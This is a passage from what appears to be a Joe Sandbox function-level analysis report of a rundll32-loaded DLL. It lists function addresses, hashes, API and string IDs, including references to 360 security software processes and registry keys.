                                                                                                  • Opcode Fuzzy Hash: a7524d0a6a2f2a6811e2d6bfe887dea111f6d1a43d9b514e68db11bdf2e08a92
                                                                                                  • Instruction Fuzzy Hash: A8C1B172710A488AEB929B25D8407DD33A0F749BE8F448216FE6D47BE5DF38C689C744
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180036EC8 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 238COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschrwcscmpwcsstr$FromHeapProcessString_wcslwr
                                                                                                  • String ID: clsid$clsid2
                                                                                                  • API String ID: 2934854147-3646038404
                                                                                                  • Opcode ID: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                                                  • Instruction ID: bd95a24bb0aafbb45aea4f5794df0f126b37bc211fbb868afd4ed2029302fca7
                                                                                                  • Opcode Fuzzy Hash: 911e3de000ae97c58b3acce3279f437468a1569be05101070c01195505b2f66e
                                                                                                  • Instruction Fuzzy Hash: 86A16172701A4885EBA79B29C8503EE63A1FB49BD4F46C122FA1D477D6EF74CA49C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003721C Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 234stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: strchrwcscmpwcsstr$FromHeapProcessString_strlwr
                                                                                                  • String ID: clsid$clsid2
                                                                                                  • API String ID: 3075496951-3646038404
                                                                                                  • Opcode ID: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
                                                                                                  • Instruction ID: 52fbb44663529e4af6cb5c57c7c12c2662acde33668ab69cc9482a834562ed8e
                                                                                                  • Opcode Fuzzy Hash: b34bb257c4012ea5ea7ec63a1f36afb4f32d3c0f990deb4b92841445b61a349c
                                                                                                  • Instruction Fuzzy Hash: B3A14E72301A4886EBA79B25C4503EE67A1BB49BD8F45C121FA1D477D6EF78CA89C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180068390 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@memmovememset
                                                                                                  • String ID: generic$unknown error
                                                                                                  • API String ID: 2528313377-3628847473
                                                                                                  • Opcode ID: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                                                  • Instruction ID: f953be595861da4e4b866d1587ee45b735e1f1b3269ec21885f27e4079069760
                                                                                                  • Opcode Fuzzy Hash: de4f988636b97df9b255ecc11943299432ed388bb3462f1d961b5968a0cd6148
                                                                                                  • Instruction Fuzzy Hash: 4451A372704B8882EF459B16DA443AD6362F749BD0F50C221FB6A07BD6EF78C6A59340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800744F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                  • String ID: AddDllDirectory$kernel32
                                                                                                  • API String ID: 1437655972-3758863895
                                                                                                  • Opcode ID: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
                                                                                                  • Instruction ID: bbf3e12eda5f2f818c86a6d8723dcf8fbef42ab492d342ab48d7d832c77590ad
                                                                                                  • Opcode Fuzzy Hash: 62d5c79b2ea4fb088856e3f0301c9a109d3b9d8bbbaf54877c47554339dab04f
                                                                                                  • Instruction Fuzzy Hash: 7751E53231164885FEA6CF51E4103E962A0FB5DBE4F48C621EA6A4B7D4DF3DC649C705
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180040688 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterErrorLastLeavememsetstd::_std::exception_ptr::exception_ptr
                                                                                                  • String ID: arm64$x64$x86
                                                                                                  • API String ID: 4069188616-280937049
                                                                                                  • Opcode ID: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                                                  • Instruction ID: 117583cd4254ef97ff9b72dc100ece26d9127ce95370434fd6434e2e215e4972
                                                                                                  • Opcode Fuzzy Hash: 80f3249773d162cbeeb550be5abaaeac6b7c95d6a1b3ac1e44b50876622fa97b
                                                                                                  • Instruction Fuzzy Hash: 78415B71B00A1C95FA92DB20EC843D937A4F70C7E8FA58611F96A536E6DF34C68AC740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180040E18 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCurrentErrorHandleLastModuleProcProcessstd::_std::exception_ptr::exception_ptr
                                                                                                  • String ID: IsWow64Process2$Kernel32.dll
                                                                                                  • API String ID: 1364622999-2175735969
                                                                                                  • Opcode ID: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                                                  • Instruction ID: 5a1c62e2a9ead4f3428123871bab1930646db393e55966b9c052552951b7636c
                                                                                                  • Opcode Fuzzy Hash: 6751241f688bd49d1875dc8d854f79e14c2fff9f0de6f06901ba81ab434c2c27
                                                                                                  • Instruction Fuzzy Hash: DD416531204B4991EAA2CF14EC843DA73A4FB8D794FA18226F659437A5DF38CB4DCB44
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00000001800197DC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastMutexOpen
                                                                                                  • String ID: Local\Q360MonMutex$Local\Q360SafeI18NTray
                                                                                                  • API String ID: 2816522056-3343745797
                                                                                                  • Opcode ID: ecc565a9ab11a347c3d3f5477b7a4cd1cc110664247bbd5ff13aaeded14a432c
                                                                                                  • Instruction ID: ccff18e50d48ae3a619361c3ef7b9f3de39f23092404f672028fbe7f8de5d576
                                                                                                  • Opcode Fuzzy Hash: ecc565a9ab11a347c3d3f5477b7a4cd1cc110664247bbd5ff13aaeded14a432c
                                                                                                  • Instruction Fuzzy Hash: E8314B30502B5982F7D29BA4BC943E823A8F74EBA0F558124F569823E1CF39CB9CC700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018003C6D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 69libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$Leave$AddressEnterFreeInitializeLibraryProc
                                                                                                  • String ID: InitLibs
                                                                                                  • API String ID: 388043826-2748520195
                                                                                                  • Opcode ID: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                                                  • Instruction ID: 14a8bfa7cef1bdae3a626f07b321ff872beb2833b4a3adf2d3b4914cd80619d3
                                                                                                  • Opcode Fuzzy Hash: d54e888b80642ae16c136f4daec8858b4574610897ae795fcaa0a3f587715d16
                                                                                                  • Instruction Fuzzy Hash: 5631953661874882EBA78F25A4547AE23B0F78DFD4F1A9125ED5A473A4DF38C649CB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018001B004 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileName_wcsicmp$FindModulePathmemset
                                                                                                  • String ID: 360tray.exe$QHSafeTray.exe
                                                                                                  • API String ID: 2436975468-72543816
                                                                                                  • Opcode ID: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                                                  • Instruction ID: f13d88eabac643da90db78e2c45270d8f51b6174de2d3bfd56aa28c15744bb18
                                                                                                  • Opcode Fuzzy Hash: a7768d738e7b534716dd32aca9e4ff23bf3b7449249a9ac96035ea6388957e04
                                                                                                  • Instruction Fuzzy Hash: 86114230615B4882FBA6CB21EC593D62364FB8C7A5F408225E56A867E5EF3DC74DCB00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018005A8D8 Relevance: 12.1, APIs: 8, Instructions: 141COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection_time64$EnterLeave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3499907473-0
                                                                                                  • Opcode ID: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                                                  • Instruction ID: 2d3d355faa5a201e66dfe59503a55f94d93e9d2144db4385c4ebef4b0973e561
                                                                                                  • Opcode Fuzzy Hash: fad2f7b7927532790d07ba8be1895770e69b37db2dedf9ef4961b264574dfbe7
                                                                                                  • Instruction Fuzzy Hash: B9517B31605B4889FB968F25E9543D933A5FB0EBE8F548115FD5A27764CF39C689C300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180074200 Relevance: 12.1, APIs: 8, Instructions: 98COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _errno
                                                                                                  • String ID:
                                                                                                  • API String ID: 2918714741-0
                                                                                                  • Opcode ID: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                                                  • Instruction ID: 8158435372b26aa4a6dd2edb7174a458af360551698bfd787e5366ef90707461
                                                                                                  • Opcode Fuzzy Hash: 97c6daf75c94dd34b649a7a3f9a9ab6583bbf65966f83f2829fedd4982e22aff
                                                                                                  • Instruction Fuzzy Hash: 0441A733604A4886EAA36FA9A4003DD7290BB8C7F4F55C310FA684B7D6CF3DC6598711
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180061518 Relevance: 11.3, APIs: 9, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1294909896-0
                                                                                                  • Opcode ID: 479d6b322858d1b6fb9b2a33bd2b2862127450e003e1d21a635a901cbd1a60b9
                                                                                                  • Instruction ID: d0fbe37a2b12f24882e89a36d068dfa1d6ae687bd891c2bf64f12d69b9b9f573
                                                                                                  • Opcode Fuzzy Hash: 479d6b322858d1b6fb9b2a33bd2b2862127450e003e1d21a635a901cbd1a60b9
                                                                                                  • Instruction Fuzzy Hash: 88318B36602B189AFF8ADFD1D9543B823A1FF88B86F198514DA670B554CF38C698C341
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180056664 Relevance: 11.0, APIs: 1, Strings: 5, Instructions: 463registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                                                    • Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
                                                                                                    • Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
                                                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
                                                                                                    • Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
                                                                                                    • Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A
                                                                                                  • RegCloseKey.ADVAPI32 ref: 0000000180056B49
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AppendPath$CloseFileHeapModuleNameProcess_wcsicmpmemset
                                                                                                  • String ID: 360EntSecurity$360Safe$?$SOFTWARE\$SOFTWARE\Wow6432Node\
                                                                                                  • API String ID: 2226481571-3054377637
                                                                                                  • Opcode ID: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                                                  • Instruction ID: 5d79a3dbe08d97a28ec647ffc4188a53122dfd3fad7d09cd3595c12d58dad182
                                                                                                  • Opcode Fuzzy Hash: 559c51600a1c84c3d1a9e1e9348cf60bbaa67dd7de1927a7c1e5ea5049295e34
                                                                                                  • Instruction Fuzzy Hash: 211261B2701A4886EB419B69C8413DD73A1FB85BF4F448711AA3D977E5DF78CA89C340
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018002D320 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 350COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLSID$FILETYPE
                                                                                                  • API String ID: 0-673176369
                                                                                                  • Opcode ID: 4c244d9c868472f455db6426f5af94abee75d2223c47d993bd46d00cae99b97c
                                                                                                  • Instruction ID: 664a91b93eddc4d250d885b2200669a72768227afd9472cb587bdefcc3a95370
                                                                                                  • Opcode Fuzzy Hash: 4c244d9c868472f455db6426f5af94abee75d2223c47d993bd46d00cae99b97c
                                                                                                  • Instruction Fuzzy Hash: CFF16B72615B8886EB92CF25E8407DD63A1F788BE4F149212FE5D43B99DF78CA44C740
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 000000018004C720 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 248COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString$??2@??3@_wtoi
                                                                                                  • String ID: //reccfg/wndclass
                                                                                                  • API String ID: 1119205991-3779619899
                                                                                                  • Opcode ID: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                                                  • Instruction ID: aac1c87dd54dd223690f6a51cef8bcee3ce48f855a47f00273c96f55abf577db
                                                                                                  • Opcode Fuzzy Hash: 9c78ad74510e5c1aaa63a647f98f978ea0f712cabf314f4090d01513adc07354
                                                                                                  • Instruction Fuzzy Hash: D5B17A32701E489AEB81CF79C4803DC33A0F749B98F058626EA1E57B98DF38CA59C345
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0000000180042664 Relevance: 10.7, APIs: 7, Instructions: 237networkCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2267288903.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2267265690.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267428015.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267919442.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2267975563.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2268777089.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$htonl$htonsmemmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 2604728826-0
                                                                                                  • Opcode ID: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
                                                                                                  • Instruction ID: c6a7ef21b5906d6b557d77442a06c91d81bd98b5ee7ca8850e16d0b233cac89c
                                                                                                  • Opcode Fuzzy Hash: 47040365556197fad99d51432fd7888eae327b64f784180218b7cf6a30f5653d
